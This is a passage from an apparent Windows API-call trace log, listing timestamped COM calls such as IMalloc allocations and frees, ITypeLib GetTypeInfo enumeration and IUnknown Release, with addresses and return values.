0xb490e30 [0030.831] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.831] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.831] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.831] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.832] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.832] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.832] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.832] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.832] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb490e30 [0030.832] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x18 [0030.832] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.832] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.832] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.833] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.833] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0030.833] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490e30) returned 0x10 [0030.833] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0030.841] IUnknown:Release (This=0xb4cbf90) returned 0x1 [0030.841] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cbfe8) returned 0x0 [0030.847] IUnknown:Release (This=0xb4cbfe8) returned 0x1 [0030.847] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc040) returned 0x0 [0030.847] IUnknown:Release (This=0xb4cc040) returned 0x1 [0030.847] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x6, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc098) returned 0x0 [0030.848] IUnknown:Release (This=0xb4cc098) returned 0x1 [0030.848] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x7, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc0f0) returned 0x0 [0030.848] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491290 [0030.848] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491290) returned 0x18 [0030.854] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0030.854] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.854] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.854] IMalloc:Free (This=0x7fefe015380, pv=0xb4f63f0) [0030.854] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.854] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.854] IMalloc:Free (This=0x7fefe015380, pv=0xb4f63f0) [0030.854] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491290 [0030.854] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491290) returned 0x10 [0030.854] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0030.854] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667020 [0030.854] IMalloc:GetSize (This=0x7fefe015380, pv=0x7667020) returned 0x20 [0030.854] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0030.854] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0030.854] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0030.859] IMalloc:Free (This=0x7fefe015380, pv=0x76db480) [0030.860] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e3df0 [0030.860] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e3df0) returned 0x48 [0030.865] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.865] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.865] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.865] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.865] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.865] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.865] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0030.865] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0030.866] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.866] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.866] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.866] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.866] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.866] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.872] IUnknown:Release (This=0xb4cc0f0) returned 0x1 [0030.872] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc1a0) returned 0x0 [0030.872] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0030.872] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0030.878] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.878] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.878] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.878] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.878] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.878] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.878] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666f90 [0030.878] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666f90) returned 0x20 [0030.878] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0030.878] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0030.884] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e3ee0 [0030.884] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e3ee0) returned 0x48 [0030.889] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.889] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.890] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.890] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.895] IUnknown:Release (This=0xb4cc1a0) returned 0x1 [0030.895] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc250) returned 0x0 [0030.895] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0030.895] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0030.900] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.900] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.900] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.900] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.900] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.900] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.901] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766dbf0 [0030.901] IMalloc:GetSize (This=0x7fefe015380, pv=0x766dbf0) returned 0x20 [0030.901] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0030.901] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0030.906] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e3fd0 [0030.906] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e3fd0) returned 0x48 [0030.911] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.911] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.911] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.911] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.917] IUnknown:Release (This=0xb4cc250) returned 0x1 [0030.917] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc300) returned 0x0 [0030.917] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0030.917] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0030.922] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.922] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.922] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.922] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.922] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.922] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.922] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666f90 [0030.922] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666f90) returned 0x20 [0030.923] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0030.923] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0030.928] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e40c0 [0030.928] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e40c0) returned 0x48 [0030.934] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.934] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.934] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.934] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.939] IUnknown:Release (This=0xb4cc300) returned 0x1 [0030.939] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xb, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc3b0) returned 0x0 [0030.939] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0030.939] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0030.944] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.944] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.944] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.944] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.944] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.944] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.945] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766dbf0 [0030.945] IMalloc:GetSize (This=0x7fefe015380, pv=0x766dbf0) returned 0x20 [0030.945] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0030.945] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0030.950] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e41b0 [0030.950] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e41b0) returned 0x48 [0030.956] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.956] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.956] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.956] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.961] IUnknown:Release (This=0xb4cc3b0) returned 0x1 [0030.961] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xc, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc460) returned 0x0 [0030.961] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0030.961] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0030.966] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.966] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.966] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.966] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.966] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.966] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.967] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666f90 [0030.967] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666f90) returned 0x20 [0030.967] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0030.967] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0030.973] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e42a0 [0030.973] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e42a0) returned 0x48 [0030.978] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0030.978] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0030.979] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0030.979] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0030.985] IUnknown:Release (This=0xb4cc460) returned 0x1 [0030.985] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xd, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc510) returned 0x0 [0030.985] IUnknown:Release (This=0xb4cc510) returned 0x1 [0030.985] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xe, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc568) returned 0x0 [0030.986] IUnknown:Release (This=0xb4cc568) returned 0x1 [0030.986] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xf, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc5c0) returned 0x0 [0030.986] IUnknown:Release (This=0xb4cc5c0) returned 0x1 [0030.986] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x10, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc618) returned 0x0 [0030.987] IUnknown:Release (This=0xb4cc618) returned 0x1 [0030.987] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x11, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc670) returned 0x0 [0030.988] IUnknown:Release (This=0xb4cc670) returned 0x1 [0030.988] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x12, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc6c8) returned 0x0 [0030.988] IUnknown:Release (This=0xb4cc6c8) returned 0x1 [0030.988] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x13, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc720) returned 0x0 [0030.989] IUnknown:Release (This=0xb4cc720) returned 0x1 [0030.989] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x14, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc778) returned 0x0 [0030.991] IUnknown:Release (This=0xb4cc778) returned 0x1 [0030.991] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x15, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc7d0) returned 0x0 [0030.991] IUnknown:Release (This=0xb4cc7d0) returned 0x1 [0030.991] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x16, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc828) returned 0x0 [0030.993] IUnknown:Release (This=0xb4cc828) returned 0x1 [0030.993] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x17, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc880) returned 0x0 [0030.993] IUnknown:Release (This=0xb4cc880) returned 0x1 [0030.993] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x18, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc8d8) returned 0x0 [0030.994] IUnknown:Release (This=0xb4cc8d8) returned 0x1 [0030.994] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x19, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc930) returned 0x0 [0030.994] IUnknown:Release (This=0xb4cc930) returned 0x1 [0030.994] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc988) returned 0x0 [0030.994] IUnknown:Release (This=0xb4cc988) returned 0x1 [0030.994] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc9e0) returned 0x0 [0030.995] IUnknown:Release (This=0xb4cc9e0) returned 0x1 [0030.995] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cca38) returned 0x0 [0030.995] IUnknown:Release (This=0xb4cca38) returned 0x1 [0030.995] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cca90) returned 0x0 [0030.996] IUnknown:Release (This=0xb4cca90) returned 0x1 [0030.996] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccae8) returned 0x0 [0030.996] IUnknown:Release (This=0xb4ccae8) returned 0x1 [0030.996] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccb40) returned 0x0 [0030.997] IUnknown:Release (This=0xb4ccb40) returned 0x1 [0030.997] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x20, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccb98) returned 0x0 [0030.998] IUnknown:Release (This=0xb4ccb98) returned 0x1 [0030.998] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x21, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccbf0) returned 0x0 [0030.998] IUnknown:Release (This=0xb4ccbf0) returned 0x1 [0030.998] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x22, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccc48) returned 0x0 [0030.999] IUnknown:Release (This=0xb4ccc48) returned 0x1 [0030.999] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x23, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccca0) returned 0x0 [0030.999] IUnknown:Release (This=0xb4ccca0) returned 0x1 [0030.999] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x24, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cccf8) returned 0x0 [0031.000] IUnknown:Release (This=0xb4cccf8) returned 0x1 [0031.000] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x25, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccd50) returned 0x0 [0031.000] IUnknown:Release (This=0xb4ccd50) returned 0x1 [0031.000] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x26, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccda8) returned 0x0 [0031.000] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491370 [0031.001] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x18 [0031.006] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.006] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.006] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.006] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.006] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.006] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.006] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666f90 [0031.006] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666f90) returned 0x20 [0031.006] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db480 [0031.006] IMalloc:GetSize (This=0x7fefe015380, pv=0x76db480) returned 0x30 [0031.012] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5560 [0031.012] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5560) returned 0x48 [0031.017] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.017] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.017] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.017] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.018] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.018] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.019] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.019] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.020] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.020] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.021] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.021] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.021] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.021] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.021] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.021] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.022] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.022] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.023] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.023] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.024] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.025] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.025] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491370) returned 0x10 [0031.025] IMalloc:Alloc 